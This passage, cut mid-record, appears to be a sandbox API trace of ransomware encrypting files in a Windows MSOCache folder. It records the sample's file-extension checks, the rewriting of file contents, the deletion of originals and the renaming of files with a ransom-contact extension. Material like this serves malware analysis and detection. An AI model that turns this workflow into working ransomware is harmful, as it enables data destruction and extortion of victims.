Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.607] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.607] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.607] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.607] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0047.607] GetLastError () returned 0x0 [0047.607] ReadFile (in: hFile=0x198, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0047.622] WriteFile (in: hFile=0x16c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0047.635] ReadFile (in: hFile=0x198, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.636] WriteFile (in: hFile=0x16c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0x104, lpOverlapped=0x0) returned 1 [0047.636] SetEndOfFile (hFile=0x16c) returned 1 [0047.636] CloseHandle (hObject=0x16c) returned 1 [0047.636] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.636] SetEndOfFile (hFile=0x198) returned 1 [0047.925] CloseHandle (hObject=0x198) returned 1 [0047.925] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0047.926] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0047.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.927] lstrlenW (lpString=".doc") returned 4 [0047.927] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0047.927] lstrlenW (lpString=".docx") returned 5 [0047.927] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0047.927] lstrlenW (lpString=".pdf") returned 4 [0047.927] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0047.927] lstrlenW (lpString=".xls") returned 4 [0047.927] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0047.927] lstrlenW (lpString=".xlsx") returned 5 [0047.927] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0047.927] lstrlenW (lpString=".ppt") returned 4 [0047.927] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0047.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.927] lstrlenW (lpString=".zip") returned 4 [0047.927] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0047.927] lstrlenW (lpString=".rar") returned 4 [0047.927] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0047.927] lstrlenW (lpString=".bz2") returned 4 [0047.927] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0047.927] lstrlenW (lpString=".7z") returned 3 [0047.927] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0047.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.927] lstrlenW (lpString=".dbf") returned 4 [0047.927] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0047.927] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.928] lstrlenW (lpString=".1cd") returned 4 [0047.928] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0047.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.928] lstrlenW (lpString=".jpg") returned 4 [0047.928] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0047.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.928] lstrlenW (lpString=".doc") returned 4 [0047.928] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0047.928] lstrlenW (lpString=".docx") returned 5 [0047.928] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0047.928] lstrlenW (lpString=".pdf") returned 4 [0047.928] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0047.928] lstrlenW (lpString=".xls") returned 4 [0047.928] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0047.928] lstrlenW (lpString=".xlsx") returned 5 [0047.928] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0047.928] lstrlenW (lpString=".ppt") returned 4 [0047.928] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0047.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.928] lstrlenW (lpString=".zip") returned 4 [0047.928] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0047.928] lstrlenW (lpString=".rar") returned 4 [0047.928] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0047.928] lstrlenW (lpString=".bz2") returned 4 [0047.928] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0047.928] lstrlenW (lpString=".7z") returned 3 [0047.928] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0047.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.928] lstrlenW (lpString=".dbf") returned 4 [0047.928] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0047.928] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.928] lstrlenW (lpString=".1cd") returned 4 [0047.929] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0047.929] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0047.929] lstrlenW (lpString=".jpg") returned 4 [0047.929] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0047.929] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0047.929] lstrlenW (lpString="Office32WW.msi") returned 14 [0047.929] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.929] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=1992192) returned 1 [0047.929] CloseHandle (hObject=0x198) returned 1 [0047.929] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0047.929] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.929] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0047.930] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.930] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.930] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.930] ReadFile (in: hFile=0x198, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.932] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.932] ReadFile (in: hFile=0x198, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.935] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x370fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.935] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x370fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.935] ReadFile (in: hFile=0x198, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x370fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x370fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.950] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.950] WriteFile (in: hFile=0x198, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x370fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0048.089] SetEndOfFile (hFile=0x198) returned 1 [0048.090] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f720a8 [0048.310] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.310] WriteFile (in: hFile=0x198, lpBuffer=0x3f720a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f720a8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.314] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.314] WriteFile (in: hFile=0x198, lpBuffer=0x3f720a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f720a8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.317] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x370fc7c | out: lpNewFilePointer=0x0) returned 1 [0048.317] WriteFile (in: hFile=0x198, lpBuffer=0x3f720a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x370fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f720a8*, lpNumberOfBytesWritten=0x370fc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.318] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f720a8 | out: hHeap=0x5f0000) returned 1 [0048.318] CloseHandle (hObject=0x198) returned 1 [0048.318] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0048.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.319] lstrlenW (lpString=".doc") returned 4 [0048.319] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.319] lstrlenW (lpString=".docx") returned 5 [0048.319] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.319] lstrlenW (lpString=".pdf") returned 4 [0048.319] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.319] lstrlenW (lpString=".xls") returned 4 [0048.319] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.319] lstrlenW (lpString=".xlsx") returned 5 [0048.319] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.319] lstrlenW (lpString=".ppt") returned 4 [0048.319] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.319] lstrlenW (lpString=".zip") returned 4 [0048.319] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.319] lstrlenW (lpString=".rar") returned 4 [0048.319] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.319] lstrlenW (lpString=".bz2") returned 4 [0048.319] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.319] lstrlenW (lpString=".7z") returned 3 [0048.319] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.319] lstrlenW (lpString=".dbf") returned 4 [0048.319] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.319] lstrlenW (lpString=".1cd") returned 4 [0048.319] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.319] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.319] lstrlenW (lpString=".jpg") returned 4 [0048.319] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.320] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.320] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.320] lstrlenW (lpString=".doc") returned 4 [0048.320] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.320] lstrlenW (lpString=".docx") returned 5 [0048.320] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0048.320] lstrlenW (lpString=".pdf") returned 4 [0048.320] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.320] lstrlenW (lpString=".xls") returned 4 [0048.320] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.320] lstrlenW (lpString=".xlsx") returned 5 [0048.320] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0048.320] lstrlenW (lpString=".ppt") returned 4 [0048.320] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.320] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.320] lstrlenW (lpString=".zip") returned 4 [0048.320] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.320] lstrlenW (lpString=".rar") returned 4 [0048.320] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.320] lstrlenW (lpString=".bz2") returned 4 [0048.320] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.320] lstrlenW (lpString=".7z") returned 3 [0048.320] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.320] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.320] lstrlenW (lpString=".dbf") returned 4 [0048.320] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0048.320] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.320] lstrlenW (lpString=".1cd") returned 4 [0048.320] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0048.320] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0048.320] lstrlenW (lpString=".jpg") returned 4 [0048.320] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0048.321] lstrcmpiW (lpString1=".dll", lpString2=".0day") returned 1 [0048.321] lstrlenW (lpString="PidGenX.dll") returned 11 [0048.321] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0048.321] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=1463568) returned 1 [0048.321] CloseHandle (hObject=0x198) returned 1 [0048.321] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 0x2020 [0048.321] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0048.321] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0048.321] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.321] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.321] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0048.321] GetLastError () returned 0x0 [0048.321] ReadFile (in: hFile=0x198, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0048.343] WriteFile (in: hFile=0x220, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0048.654] ReadFile (in: hFile=0x198, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x65520, lpOverlapped=0x0) returned 1 [0048.666] WriteFile (in: hFile=0x220, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x65530, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0x65530, lpOverlapped=0x0) returned 1 [0048.676] ReadFile (in: hFile=0x198, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.676] WriteFile (in: hFile=0x220, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.676] SetEndOfFile (hFile=0x220) returned 1 [0048.676] CloseHandle (hObject=0x220) returned 1 [0048.682] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.682] SetEndOfFile (hFile=0x198) returned 1 [0049.749] CloseHandle (hObject=0x198) returned 1 [0049.810] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0049.965] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pidgenx.dll")) returned 1 [0049.965] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.966] lstrlenW (lpString=".doc") returned 4 [0049.966] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.966] lstrlenW (lpString=".docx") returned 5 [0049.966] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0049.966] lstrlenW (lpString=".pdf") returned 4 [0049.966] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.966] lstrlenW (lpString=".xls") returned 4 [0049.966] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.966] lstrlenW (lpString=".xlsx") returned 5 [0049.966] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0049.966] lstrlenW (lpString=".ppt") returned 4 [0049.966] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.966] lstrlenW (lpString=".zip") returned 4 [0049.966] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.966] lstrlenW (lpString=".rar") returned 4 [0049.966] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.966] lstrlenW (lpString=".bz2") returned 4 [0049.966] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.966] lstrlenW (lpString=".7z") returned 3 [0049.966] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.966] lstrlenW (lpString=".dbf") returned 4 [0049.966] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.966] lstrlenW (lpString=".1cd") returned 4 [0049.966] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.966] lstrlenW (lpString=".jpg") returned 4 [0049.966] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.966] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.967] lstrlenW (lpString=".doc") returned 4 [0049.967] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0049.967] lstrlenW (lpString=".docx") returned 5 [0049.967] lstrcmpiW (lpString1=".docx", lpString2="X.dll") returned -1 [0049.967] 